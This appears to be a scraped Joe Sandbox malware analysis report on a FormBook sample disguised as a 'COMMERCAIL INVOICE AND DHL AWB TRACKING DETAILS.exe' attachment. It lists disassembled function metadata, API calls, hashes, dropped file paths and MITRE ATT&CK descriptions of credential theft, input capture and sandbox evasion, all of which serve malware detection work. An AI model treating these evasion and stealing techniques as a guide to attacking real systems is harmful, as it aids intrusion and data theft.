Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 31f6c3fa9e56220a5dbc74fa967750756011cd3c7bc65d088a9333ebdc68715a
Instruction ID: 1057ed10ef2d2e6337af8e4346aaad2ebfdbb16cb3752a5c533736f697e191bf
Opcode Fuzzy Hash: 31f6c3fa9e56220a5dbc74fa967750756011cd3c7bc65d088a9333ebdc68715a
Instruction Fuzzy Hash: 4B012632A305278BDB21AFFDDC848BF37B5EF647547850528DA2293185EB31D580C790

Function 012A1BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 01249CB3: _wcslen.LIBCMT ref: 01249CBD

Part of subcall function 012A3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 012A3CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 012A1C46

Strings

ComboBox, xrefs: 012A1BE5
ListBox, xrefs: 012A1C10

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 1292e0bd3f8b0430cdd0166a8a78f5863f130808a74c0d575de6989d61c2002f
Instruction ID: d19a2ae01df9a2c2db3d86a0ea61361618ba16e1caeaea0cf5cabda3bef3bbc9
Opcode Fuzzy Hash: 1292e0bd3f8b0430cdd0166a8a78f5863f130808a74c0d575de6989d61c2002f
Instruction Fuzzy Hash: D6012B75BA11066BDF08EB94CD51DFF77E99F25350F400019D506632C0EA209A1CC7B2

Function 012A1D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 01249CB3: _wcslen.LIBCMT ref: 01249CBD

Part of subcall function 012A3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 012A3CCA

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 012A1DD3

Strings

ComboBox, xrefs: 012A1D75
ListBox, xrefs: 012A1DA0

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 345b5b6b865abcdaf3e77b78688f9674535e931366212e23a2dbc9858bc15cdd
Instruction ID: d7882a2e39ad55fe92c821840bd8fdb84286c5f0128ec435df9c39bfee79b00a
Opcode Fuzzy Hash: 345b5b6b865abcdaf3e77b78688f9674535e931366212e23a2dbc9858bc15cdd
Instruction Fuzzy Hash: 08F02871F716166BEB08F7A8CC51FFF77B8AB15354F440919E922632C0DA60691887E0

Function 012C747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 012C7493
_wcslen.LIBCMT ref: 012C74B9

Strings

3, 3, 16, 1, xrefs: 012C7483

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: a877feae16321b98fa7689884b4cd16b64e42e5d4d2849cb8f6f91433be0ec30
Instruction ID: a92f2f53afea3c9348c5e1414a83c53f206c4f960319e4cc4b98957ba3ec1625
Opcode Fuzzy Hash: a877feae16321b98fa7689884b4cd16b64e42e5d4d2849cb8f6f91433be0ec30
Instruction Fuzzy Hash: F9E02B062716A210A231227E9CC097FAA9EDFD5950720182FEBC1C22A5EA948DD183B0

Function 012A0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 012A0B23

Strings

Error allocating memory., xrefs: 012A0B1C
AutoIt, xrefs: 012A0B17

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: ba097d83f9f7e847179c9444c2926726d27ebf01850b5a87a0577542096e8f13
Instruction ID: 3498e5bf19c1b797d289caf46804af61368fb9a8bad00fd9ac57f181a7e96904
Opcode Fuzzy Hash: ba097d83f9f7e847179c9444c2926726d27ebf01850b5a87a0577542096e8f13
Instruction Fuzzy Hash: 6FE0D83126530927D3183695FD42FD97A888F15F20F10041EFB94555C28AE224A096AD

Function 01260D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0125F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,01260D71,?,?,?,0124100A), ref: 0125F7CE

IsDebuggerPresent.KERNEL32(?,?,?,0124100A), ref: 01260D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0124100A), ref: 01260D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 01260D7F

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: e3d8a80a4106e76231c0a02856aa6396dce04993f7c870fe5eb6b44665465922
Instruction ID: 506b2e83c81b6ebf3ad832c02d353d69d5af91192b179679615a3c2ad1fc10bb
Opcode Fuzzy Hash: e3d8a80a4106e76231c0a02856aa6396dce04993f7c870fe5eb6b44665465922
Instruction Fuzzy Hash: 3EE06D706103028BE3709F78E1086567BE8EB20B45F004A1DE586C6689DBB0E084DB95

Function 0129D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0129D220

Strings

X64, xrefs: 0129D2A8
%.3d, xrefs: 0129D22B

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 3ec4270dd17ab62f0b9a3e6d14e920afc8ccb9f78e717748c697b26418b6ae80
Instruction ID: b9c6235c945d2b9ef9d9c46f53134474a1c382fc3b9eeff68b115e47e76fa985
Opcode Fuzzy Hash: 3ec4270dd17ab62f0b9a3e6d14e920afc8ccb9f78e717748c697b26418b6ae80
Instruction Fuzzy Hash: 07D05B71C3910DEACF9096D4DD8B8BDB3BCFB18251F4084D6FC0AD1041E674D5089761

Function 012D2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32 ref: 012D232C
PostMessageW.USER32 ref: 012D233F

Part of subcall function 012AE97B: Sleep.KERNEL32 ref: 012AE9F3

Strings

Shell_TrayWnd, xrefs: 012D2325

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 38e3dbce1da46ece8c91c364bac0294f527d394cfd537b276a671f47e3e66446
Instruction ID: 9ceaa75663d49afad5fc0de1f39dc1cfb6266a2a0862ab6a693538dd1aa07c1c
Opcode Fuzzy Hash: 38e3dbce1da46ece8c91c364bac0294f527d394cfd537b276a671f47e3e66446
Instruction Fuzzy Hash: 79D02272791310BBEA78B330FC0FFC67A489B40B00F00090AB305AA1C8C9F0A811CB44

Function 012D2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32 ref: 012D236C
PostMessageW.USER32 ref: 012D2373

Part of subcall function 012AE97B: Sleep.KERNEL32 ref: 012AE9F3

Strings

Shell_TrayWnd, xrefs: 012D2365

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 948263b537fba651452f2fdf231de5a2505046087be8a6f789d7ed74f764e3b2
Instruction ID: c0ea4c58e5747f52f7e23b2f71588b1f78371675fe19b910444e3d754c261495
Opcode Fuzzy Hash: 948263b537fba651452f2fdf231de5a2505046087be8a6f789d7ed74f764e3b2
Instruction Fuzzy Hash: A1D0A972782310BBEA78A230EC0FFC676489B40B00F40090AB201AA1C8C9A0A811CB48

Function 0127BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0127BE93
GetLastError.KERNEL32 ref: 0127BEA1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0127BEFC

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 0625c88ca94718b9807ece88655e99ba05448c698b4b5fe78e504b5e10d47df1
Instruction ID: abf2e271aa4f40df7c0451e4ab43f25dce8c429bb916053abb4ab1be85722ca2
Opcode Fuzzy Hash: 0625c88ca94718b9807ece88655e99ba05448c698b4b5fe78e504b5e10d47df1
Instruction Fuzzy Hash: 31412934625217AFDF318F68D854ABB7BA8EF41B20F144159FB59972E1DB318800CF52

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\acceptancy

C:\Users\user\AppData\Local\Temp\aut6C1C.tmp

C:\Users\user\AppData\Local\Temp\aut6CC8.tmp

C:\Users\user\AppData\Local\Temp\teer

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Windows Analysis Report
COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Function 012442DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 012442A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 01282BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 0128065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 0124344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 01242B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 01243170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 01278D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Function 001B25C0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 01242C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 012761FE Relevance: 9.2, APIs: 6, Instructions: 216
COMMON

Function 001B23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138
fileCOMMON

Function 012B2947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

